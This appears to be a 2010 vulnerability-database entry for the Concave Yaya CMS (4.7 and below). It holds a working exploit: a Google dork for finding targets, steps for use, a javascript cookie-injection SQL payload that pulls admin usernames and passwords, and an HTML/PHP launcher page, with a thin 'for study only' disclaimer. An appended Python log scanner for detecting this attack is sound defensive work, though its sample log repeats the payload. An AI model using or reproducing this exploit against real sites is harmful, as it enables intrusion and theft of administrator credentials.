Concave Yaya 4.7 and below: 0day affecting all versions - vulnerability warning - the black bar safety net

2010-05-14T00:00:00
ID MYHACK58:62201026927
Type myhack58
Reporter Anonymous
Modified 2010-05-14T00:00:00

Description

EXP:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>-hi.baidu.com/5427518-</title>
</head>
<style type="text/css">
<!--
.STYLE1 { font-size:13px ; font-family: Arial, Helvetica, sans-serif}
-->
</style>
<span class="STYLE1">Concave Yaya 4.7 and below: Xday affecting all versions<br><br>
For study only; the user bears any legal consequences of misuse.<br><br>
Description:<br>
0. google : inurl:/otype.asp?classid= <br>
1. Enter the target site. If nothing unexpected happens you will have to wait a while, because you are waiting for the script timeout error; drinking some tea is recommended.<br>
2. Then type the following code into the address bar to hijack it with JavaScript.<br>
3. Refresh once, then right-click and view the page source for the user name and password.<br>
4. If your luck is bad and nothing comes out, clear the cookies and try again.<br>
5. If there is no oyaya.asp, the likely reason is that the target site runs a version lower than 4.7; the old versions are directly open to cookie injection.<br><br>
<font color=red>
javascript:alert(document.cookie="n="+escape("2 1 as id,2 as title,admin&password as oStyle,4,5,6,7,8,9 from admin union all select top 1"));
</font>
<form action="" method="post" enctype="multipart/form-data" class="STYLE1">
<br><br>
Fill in the field below. Example: www.hackqing.cn<br><br>
Target site:<input type="text" name="a" />
<input type="submit" name="submit" value="submit" /><br><br>
Back-end backup or IIS parsing, use whichever you like.
</form></span>
<span class="STYLE1">
<?php
if (!empty($_POST['a'])) {
    header("Location: http://".$_POST['a']."/oyaya.asp");
}
?></span>

Save the above code as an .htm or .html file.


Note: first published on T00ls, pking
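For defenders, the request described above leaves a recognisable trace: a cookie named n whose value is an escape()-encoded SQL fragment. The following detection sketch is an added example, not part of the original advisory; it assumes IIS W3C extended logging with the optional cs(Cookie) field enabled, and the log lines, IP addresses and session cookie names are constructed.

```python
import re
from urllib.parse import unquote

# SQL fragments that have no business inside a cookie value.
SQLI = re.compile(
    r"\bunion\s+(all\s+)?select\b|\bselect\s+top\s+\d+\b|\bfrom\s+admin\b",
    re.IGNORECASE)

def parse_w3c(lines):
    """Yield one dict per request, keyed by the names in the #Fields header."""
    fields = []
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.strip() and not line.startswith("#"):
            yield dict(zip(fields, line.split()))

def suspicious_cookies(record):
    """Return (name, decoded value) for each cookie that carries SQL syntax."""
    hits = []
    raw = record.get("cs(Cookie)", "-")
    if raw == "-":
        return hits
    for pair in raw.split(";"):
        name, _, value = pair.strip("+ ").partition("=")
        # IIS writes spaces as '+'; escape() in the browser produces %XX.
        decoded = unquote(value.replace("+", " "))
        if SQLI.search(decoded):
            hits.append((name, decoded))
    return hits

def scan(lines):
    """Return (client IP, URI, cookie name) for every flagged request."""
    return [(r.get("c-ip"), r.get("cs-uri-stem"), name)
            for r in parse_w3c(lines)
            for name, _ in suspicious_cookies(r)]

# Constructed sample log (documentation IP ranges, not real traffic).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status cs(Cookie)
2010-05-14 09:12:01 192.0.2.10 GET /otype.asp classid=3 200 ASPSESSIONIDAB=KJHGFDSA;+n=news
2010-05-14 09:13:44 198.51.100.7 GET /otype.asp classid=3 500 ASPSESSIONIDCD=QWERTYUI;+n=2%201%20as%20id%2C2%20as%20title%20from%20admin%20union%20all%20select%20top%201
2010-05-14 09:14:02 192.0.2.10 GET /index.asp - 200 -
""".splitlines()

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit on cookie n against otype.asp or oyaya.asp is a reason to review the admin table for credential exposure and to check that cookie values are never concatenated into SQL on that site.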